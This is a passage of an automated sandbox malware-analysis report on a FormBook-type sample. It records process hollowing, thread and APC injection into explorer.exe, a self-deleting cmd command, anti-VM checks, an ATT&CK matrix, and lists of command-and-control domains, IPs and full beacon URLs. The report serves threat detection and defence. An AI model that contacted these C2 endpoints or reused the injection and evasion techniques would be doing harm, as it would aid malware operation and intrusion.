          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C58ED6 mov eax, dword ptr fs:[00000030h]7_2_04C58ED6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]7_2_04B852A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]7_2_04B852A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]7_2_04B852A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]7_2_04B852A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]7_2_04B852A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBD294 mov eax, dword ptr fs:[00000030h]7_2_04BBD294
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBD294 mov eax, dword ptr fs:[00000030h]7_2_04BBD294
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1FE87 mov eax, dword ptr fs:[00000030h]7_2_04C1FE87
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB16E0 mov ecx, dword ptr fs:[00000030h]7_2_04BB16E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B976E2 mov eax, dword ptr fs:[00000030h]7_2_04B976E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2AE4 mov eax, dword ptr fs:[00000030h]7_2_04BB2AE4
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C50EA5 mov eax, dword ptr fs:[00000030h]7_2_04C50EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C50EA5 mov eax, dword ptr fs:[00000030h]7_2_04C50EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C50EA5 mov eax, dword ptr fs:[00000030h]7_2_04C50EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C046A7 mov eax, dword ptr fs:[00000030h]7_2_04C046A7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2ACB mov eax, dword ptr fs:[00000030h]7_2_04BB2ACB
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB36CC mov eax, dword ptr fs:[00000030h]7_2_04BB36CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC8EC7 mov eax, dword ptr fs:[00000030h]7_2_04BC8EC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC4A2C mov eax, dword ptr fs:[00000030h]7_2_04BC4A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC4A2C mov eax, dword ptr fs:[00000030h]7_2_04BC4A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C14257 mov eax, dword ptr fs:[00000030h]7_2_04C14257
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8E620 mov eax, dword ptr fs:[00000030h]7_2_04B8E620
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C3B260 mov eax, dword ptr fs:[00000030h]7_2_04C3B260
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C3B260 mov eax, dword ptr fs:[00000030h]7_2_04C3B260
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA3A1C mov eax, dword ptr fs:[00000030h]7_2_04BA3A1C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C58A62 mov eax, dword ptr fs:[00000030h]7_2_04C58A62
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBA61C mov eax, dword ptr fs:[00000030h]7_2_04BBA61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBA61C mov eax, dword ptr fs:[00000030h]7_2_04BBA61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B85210 mov eax, dword ptr fs:[00000030h]7_2_04B85210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B85210 mov ecx, dword ptr fs:[00000030h]7_2_04B85210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B85210 mov eax, dword ptr fs:[00000030h]7_2_04B85210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B85210 mov eax, dword ptr fs:[00000030h]7_2_04B85210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8AA16 mov eax, dword ptr fs:[00000030h]7_2_04B8AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8AA16 mov eax, dword ptr fs:[00000030h]7_2_04B8AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B98A0A mov eax, dword ptr fs:[00000030h]7_2_04B98A0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8C600 mov eax, dword ptr fs:[00000030h]7_2_04B8C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8C600 mov eax, dword ptr fs:[00000030h]7_2_04B8C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8C600 mov eax, dword ptr fs:[00000030h]7_2_04B8C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB8E00 mov eax, dword ptr fs:[00000030h]7_2_04BB8E00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC927A mov eax, dword ptr fs:[00000030h]7_2_04BC927A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]7_2_04BAAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]7_2_04BAAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]7_2_04BAAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]7_2_04BAAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]7_2_04BAAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41608 mov eax, dword ptr fs:[00000030h]7_2_04C41608
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9766D mov eax, dword ptr fs:[00000030h]7_2_04B9766D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89240 mov eax, dword ptr fs:[00000030h]7_2_04B89240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89240 mov eax, dword ptr fs:[00000030h]7_2_04B89240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89240 mov eax, dword ptr fs:[00000030h]7_2_04B89240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89240 mov eax, dword ptr fs:[00000030h]7_2_04B89240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]7_2_04B97E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]7_2_04B97E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]7_2_04B97E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]7_2_04B97E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]7_2_04B97E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]7_2_04B97E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C3FE3F mov eax, dword ptr fs:[00000030h]7_2_04C3FE3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C053CA mov eax, dword ptr fs:[00000030h]7_2_04C053CA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C053CA mov eax, dword ptr fs:[00000030h]7_2_04C053CA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4BAD mov eax, dword ptr fs:[00000030h]7_2_04BB4BAD
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4BAD mov eax, dword ptr fs:[00000030h]7_2_04BB4BAD
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4BAD mov eax, dword ptr fs:[00000030h]7_2_04BB4BAD
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.boogerstv.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.161 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cleanxcare.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.107.55.6 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.239.73 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.220.199.8 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.totally-seo.com
          Source: C:\Windows\explorer.exeDomain query: www.dreamcashbuyers.com
          Source: C:\Windows\explorer.exeDomain query: www.swayam-moj.com
          Source: C:\Windows\explorer.exeNetwork Connect: 147.255.162.204 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.hfjxhs.com
          Source: C:\Windows\explorer.exeDomain query: www.cmannouncements.com
          Source: C:\Windows\explorer.exeNetwork Connect: 54.69.66.227 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.leonardocarrillo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.195.117.147 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.balloon-artists.com
          Source: C:\Windows\explorer.exeDomain query: www.adultpeace.com
          Source: C:\Windows\explorer.exeDomain query: www.defenestration.world
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 78.31.67.91 80Jump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeMemory written: C:\Users\user\Desktop\lTAPQJikGw.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: E00000Jump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe C:\Users\user\Desktop\lTAPQJikGw.exeJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000000.687115510.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.676552486.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Users\user\Desktop\lTAPQJikGw.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432746 Sample: lTAPQJikGw Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 29 www.myfavbutik.com 2->29 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 7 other signatures 2->51 10 lTAPQJikGw.exe 3 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\lTAPQJikGw.exe.log, ASCII 10->27 dropped 53 Tries to detect virtualization through RDTSC time measurements 10->53 55 Injects a PE file into a foreign processes 10->55 14 lTAPQJikGw.exe 10->14         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 14->57 59 Maps a DLL or memory area into another process 14->59 61 Sample uses process hollowing technique 14->61 63 Queues an APC in another process (thread injection) 14->63 17 control.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 37 Modifies the context of a thread in another process (thread injection) 17->37 39 Maps a DLL or memory area into another process 17->39 41 Tries to detect virtualization through RDTSC time measurements 17->41 23 cmd.exe 1 17->23         started        31 www.hfjxhs.com 156.241.53.161, 49769, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 20->31 33 www.cmannouncements.com 74.220.199.8, 49765, 80 UNIFIEDLAYER-AS-1US United States 20->33 35 16 other IPs or domains 20->35 43 System process connects to network (likely due to code injection or exploit) 20->43 signatures11 process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          lTAPQJikGw.exe44%VirustotalBrowse
          lTAPQJikGw.exe43%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          lTAPQJikGw.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.lTAPQJikGw.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.lTAPQJikGw.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.cmannouncements.com/p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.hfjxhs.com/p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.balloon-artists.com/p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.boogerstv.com/p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS100%Avira URL Cloudmalware
          https://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.leonardocarrillo.com/p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.swayam-moj.com/p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.dreamcashbuyers.com/p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.defenestration.world/p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.adultpeace.com/p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.myfavbutik.com
          		104.21.15.16
          		truetrue
            		unknown
            adultpeace.com
            		163.44.239.73
            		truetrue
              		unknown
              www.hfjxhs.com
              		156.241.53.161
              		truetrue
                		unknown
                www.cmannouncements.com
                		74.220.199.8
                		truetrue
                  		unknown
                  parkingpage.namecheap.com
                  		198.54.117.216
                  		truefalse
                    		high
                    www.leonardocarrillo.com
                    		172.107.55.6
                    		truetrue
                      		unknown
                      cleanxcare.com
                      		78.31.67.91
                      		truetrue
                        		unknown
                        www.balloon-artists.com
                        		147.255.162.204
                        		truetrue
                          		unknown
                          sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com
                          		54.69.66.227
                          		truefalse
                            		high
                            www.defenestration.world
                            		99.83.154.118
                            		truetrue
                              		unknown
                              ext-sq.squarespace.com
                              		198.185.159.144
                              		truefalse
                                		high
                                swayam-moj.com
                                		199.195.117.147
                                		truetrue
                                  		unknown
                                  www.swayam-moj.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.boogerstv.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.cleanxcare.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.adultpeace.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.totally-seo.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.dreamcashbuyers.com
